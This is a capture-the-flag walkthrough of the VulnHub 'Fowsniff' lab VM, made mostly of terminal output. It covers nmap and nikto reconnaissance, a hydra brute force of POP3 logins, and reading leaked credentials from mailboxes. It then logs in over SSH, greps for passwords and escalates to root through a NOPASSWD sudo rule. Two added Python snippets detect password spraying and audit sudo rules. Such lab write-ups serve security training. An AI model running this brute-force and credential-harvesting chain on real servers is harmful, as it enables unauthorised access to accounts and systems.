┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:09 CST
Nmap scan report for 192.168.56.1
Host is up (0.00030s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00014s latency).
MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.107
Host is up (0.00032s latency).
MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.88 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.107
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:09 CST
Stats: 0:01:53 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.33% done; ETC: 23:11 (0:00:11 remaining)
Stats: 0:03:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 23:12 (0:00:00 remaining)
Warning: 192.168.56.107 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.107
Host is up (0.0060s latency).
Not shown: 37408 filtered tcp ports (no-response), 28123 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 248.28 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.56.107
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:14 CST
Nmap scan report for 192.168.56.107
Host is up (0.00050s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 903566f4c6d295121be8cddeaa4e0323 (RSA)
|   256 539d236734cf0ad55a9a1174bdfdde71 (ECDSA)
|_  256 a28fdbae9e3dc9e6a9ca03b1d71b6683 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Fowsniff Corp - Delivering Solutions
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) TOP CAPA USER UIDL RESP-CODES AUTH-RESP-CODE PIPELINING
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS capabilities have ENABLE Pre-login IDLE listed AUTH=PLAINA0001 more post-login OK SASL-IR LITERAL+ IMAP4rev1 ID
MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.107
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-25 23:18 CST
Nmap scan report for 192.168.56.107
Host is up (0.00032s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.1.1
| http-enum:
|   /robots.txt: Robots file
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
110/tcp open  pop3
143/tcp open  imap
MAC Address: 08:00:27:B0:22:14 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 334.22 seconds
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo nikto -h http://192.168.56.107
[sudo] password for kali:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.107
+ Target Hostname:    192.168.56.107
+ Target Port:        80
+ Start Time:         2023-05-25 23:37:26 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: a45, size: 5674fd157f6d0, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /images/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-05-25 23:37:50 (GMT8) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
---- Entering directory: http://192.168.56.107/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.107/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ telnet 192.168.56.107 110
Trying 192.168.56.107...
Connected to 192.168.56.107.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
user mauer
+OK
pass carp4ever
-ERR [AUTH] Authentication failed.
us-ERR Disconnected for inactivity.
Connection closed by foreign host.
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ hydra -L username -P password -s 110 192.168.56.107 pop3
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-26 00:46:04
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 80 login tries (l:10/p:8), ~5 tries per task
[DATA] attacking pop3://192.168.56.107:110/
[110][pop3] host: 192.168.56.107   login: seina   password: scoobydoo2
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-26 00:46
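The defender-side counterpart of the hydra run above, as an added example that is not part of the original walkthrough: a detector over constructed Dovecot `pop3-login` log lines (default syslog layout assumed) that flags a client spraying passwords across the user list taken from the mail thread and records whether an account then logged in from the same address. The log lines, thresholds and function names (`parse_line`, `detect_spray`) are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Dovecot log sample in its default syslog layout: one "Disconnected (auth failed ...)"
# line per rejected login, one "Login:" line per success; rip= is the client address.
SAMPLE_LOG = """\
May 26 00:46:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<mauer>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, session=<s1>
May 26 00:46:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<mursten>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, session=<s2>
May 26 00:46:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<mustikka>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, session=<s3>
May 26 00:46:05 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<parede>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, session=<s4>
May 26 00:46:05 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 0 secs): user=<sciana>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, session=<s5>
May 26 00:46:06 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=192.168.56.144, lip=192.168.56.107, mpid=2188, session=<s6>
May 26 00:52:31 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<seina>, method=PLAIN, rip=192.168.56.20, lip=192.168.56.107, session=<s7>
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: (?:pop3|imap)-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)")

def parse_line(line):
    """Return (timestamp, user, client_ip, success) for a login-related line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")  # syslog carries no year
    return ts, m["user"], m["rip"], m["event"] == "Login"

def detect_spray(log_text, window=timedelta(seconds=60), min_failures=5, min_users=3):
    """Flag client IPs with >= min_failures failed logins spread over >= min_users accounts
    within `window`, and record any account that logged in from that IP right afterwards."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_ip[ev[2]].append(ev)
    alerts = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        fails = [e for e in events if not e[3]]
        start = 0
        for end in range(len(fails)):          # sliding window over the failures only
            while fails[end][0] - fails[start][0] > window:
                start += 1
            burst = fails[start:end + 1]
            users = {e[1] for e in burst}
            if len(burst) >= min_failures and len(users) >= min_users:
                last = burst[-1][0]
                ok = sorted({e[1] for e in events if e[3] and last <= e[0] <= last + window})
                alerts[ip] = {"failures": len(burst), "users": sorted(users), "then_logged_in": ok}
    return alerts
```

The single failure from 192.168.56.20 stays below the threshold, while the burst from 192.168.56.144 followed by the `seina` login is exactly the pattern the hydra run above leaves behind.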
┌──(kali㉿kali)-[~/vulnhub/Fowsniff/workSpace]
└─$ sudo telnet 192.168.56.107 110
Trying 192.168.56.107...
Connected to 192.168.56.107.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
stat
+OK 2 2902
list
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
	id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff, mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff, tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to our internal email systems. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access our login credentials. Both the SQL and authentication system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system overhaul. While the main systems are "in the shop," we have moved to this isolated, temporary server that has minimal functionality.
This server is capable of sending and receiving emails, but only locally. That means you can only send emails to other users, not to the world wide web. You can, however, access this system via the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my guidance. I saw the leak the attacker posted online, and I must say that your passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
	id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff
Devin,
You should have seen the brass lay into AJ today! We are going to be talking about this one for a looooong time hahaha. Who knew the regional manager had been in the navy? She was swearing like a sailor!
I don't know what kind of pneumonia or something you brought back with you from your camping trip, but I think I'm coming down with it myself. How long have you been gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!
I'm going to head home early and eat some chicken soup. I think I just got an email from Stone, too, but it's probably just some "Let me explain the tone of my meeting with management" face-saving mail. I'll read it when I get back.
Feel better,
Skyler
PS: Make sure you change your email password. AJ had been telling us to do that right before Captain Profanity showed up.
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
*    Due to the recent security breach, we are running on a very minimal system.
*    Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$ whoami
baksteen
baksteen@fowsniff:~$ pwd
/home/baksteen
baksteen@fowsniff:~$ uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
baksteen@fowsniff:/opt/cube$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Nothing much in the way of scheduled tasks.

With the usual three checks done, let's go through the files in each directory by hand.

You can miss the warm winter sun, and you can miss the summer breeze, but you must never miss searching a multi-user environment for credentials that users have left behind.
baksteen@fowsniff:/home$ ll
total 44
drwxr-xr-x 11 root     root     4096 Mar  8  2018 ./
drwxr-xr-x 22 root     root     4096 Mar  9  2018 ../
drwxrwx---  4 baksteen baksteen 4096 Mar 13  2018 baksteen/
drwxrwx---  3 mauer    mauer    4096 Mar 11  2018 mauer/
drwxrwx---  3 mursten  mursten  4096 Mar 11  2018 mursten/
drwxrwx---  3 mustikka mustikka 4096 Mar 11  2018 mustikka/
drwxrwx---  3 parede   parede   4096 Mar 11  2018 parede/
drwxrwx---  3 sciana   sciana   4096 Mar 11  2018 sciana/
drwxrwx---  4 seina    seina    4096 Mar 11  2018 seina/
drwxrwx---  4 stone    stone    4096 Mar 13  2018 stone/
drwxrwx---  3 tegel    tegel    4096 Mar 11  2018 tegel/
baksteen@fowsniff:/home$ grep -R -i pass /home/* 2>/dev/null
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:The temporary password for SSH is "S1ck3nBluff+secureshell"
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:You MUST change this password as soon as possible, and you will do so under my
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff:passwords were not very secure.
However, the sysadmin configured the permissions properly: there is no way into the other users' home directories.

Fine, if we can't read anyone else's, we can at least read our own; let's see what treasures our buddy baksteen has left us.
baksteen@fowsniff:~$ ll
total 40
drwxrwx---  4 baksteen baksteen 4096 Mar 13  2018 ./
drwxr-xr-x 11 root     root     4096 Mar  8  2018 ../
-rw-------  1 baksteen users       1 Mar 13  2018 .bash_history
-rw-r--r--  1 baksteen users     220 Aug 31  2015 .bash_logout
-rw-r--r--  1 baksteen users    3771 Aug 31  2015 .bashrc
drwx------  2 baksteen users    4096 Mar  8  2018 .cache/
-rw-r--r--  1 baksteen users       0 Mar  9  2018 .lesshsQ
drwx------  5 baksteen users    4096 Mar  9  2018 Maildir/
-rw-r--r--  1 baksteen users     655 May 16  2017 .profile
-rw-r--r--  1 baksteen users      97 Mar  9  2018 term.txt
-rw-------  1 baksteen users    2981 Mar 13  2018 .viminfo
If there's a txt file, read the txt file first.
baksteen@fowsniff:~$ cat term.txt
I wonder if the person who coined the term "One Hit Wonder" came up with another other phrases.
baksteen@fowsniff:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

#[ -r /etc/lsb-release ] && . /etc/lsb-release

#if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
#        # Fall back to using the very slow lsb_release utility
#        DISTRIB_DESCRIPTION=$(lsb_release -s -d)
#fi
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
*    Due to the recent security breach, we are running on a very minimal system.
*    Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

Last login: Thu May 25 13:20:41 2023 from 192.168.56.144
baksteen@fowsniff:~$ sudo -l
Matching Defaults entries for baksteen on fowsniff:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User baksteen may run the following commands on fowsniff:
    (ALL) NOPASSWD: ALL
baksteen@fowsniff:~$ sudo su
root@fowsniff:/home/baksteen# whoami
root
root@fowsniff:/home/baksteen# cd ~
root@fowsniff:~# ll
total 28
drwx------  4 root root 4096 Mar  9  2018 ./
drwxr-xr-x 22 root root 4096 Mar  9  2018 ../
-rw-r--r--  1 root root 3117 Mar  9  2018 .bashrc
-rw-r--r--  1 root root  582 Mar  9  2018 flag.txt
drwx------  5 root root 4096 Mar  9  2018 Maildir/
drwxr-xr-x  2 root root 4096 Mar  9  2018 .nano/
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
root@fowsniff:~# cat flag.txt
[ASCII art: a "Congratulations!" banner followed by a pennant reading "R O O T  F L A G"]
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.
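An added example, not from the original post: a small parser for `sudo -l` output in the layout shown above, rating each rule so that a passwordless `(ALL) NOPASSWD: ALL` grant stands out in an audit. The sample text is constructed (its second rule is invented to show a lower-severity case), and the names `parse_sudo_l` and `assess` are this example's own.

```python
import re

# Constructed `sudo -l` output in the layout shown above; the second rule is made up to
# show a lower-severity case next to the passwordless ALL grant.
SAMPLE_SUDO_L = r"""Matching Defaults entries for baksteen on fowsniff:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User baksteen may run the following commands on fowsniff:
    (ALL) NOPASSWD: ALL
    (root) NOPASSWD: /usr/bin/systemctl status dovecot
"""

# One rule per line: "(runas_user[ : runas_group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

def parse_sudo_l(text):
    """Return the rules listed under 'may run the following commands' as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({
                "runas": m["runas"].split(":")[0].strip(),      # user part of "(user : group)"
                "tags": [t.rstrip(":") for t in m["tags"].split()],
                "commands": [c.strip() for c in m["cmds"].split(",")],
            })
    return rules

def assess(rules):
    """Rate each rule: root-equivalent ALL without a password is critical, ALL with a
    password is high, and any other NOPASSWD command deserves review."""
    findings = []
    for r in rules:
        as_root = r["runas"] in ("ALL", "root")
        if as_root and "ALL" in r["commands"] and "NOPASSWD" in r["tags"]:
            findings.append(("critical", r))
        elif as_root and "ALL" in r["commands"]:
            findings.append(("high", r))
        elif "NOPASSWD" in r["tags"]:
            findings.append(("review", r))
    return findings
```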